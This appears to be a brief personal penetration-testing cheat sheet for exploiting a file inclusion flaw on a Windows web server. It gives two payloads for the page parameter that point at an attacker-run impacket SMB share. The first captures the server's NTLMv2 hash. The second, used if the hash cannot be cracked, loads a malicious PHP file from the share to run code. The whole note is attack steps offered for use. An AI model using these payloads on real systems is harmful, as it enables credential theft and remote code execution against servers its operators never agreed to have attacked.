# check for File inclusion esp if it is a Windows MAchine!
# start up a impacket smbserver on your attacker

?page=//<attacker ip>/<share>/anything.txt
capture the NTLMv2 hash

# if hash cannot crack
# then host a malicious php file and then smbserver again and then

?page=//<attacker ip>/<share>/evil.php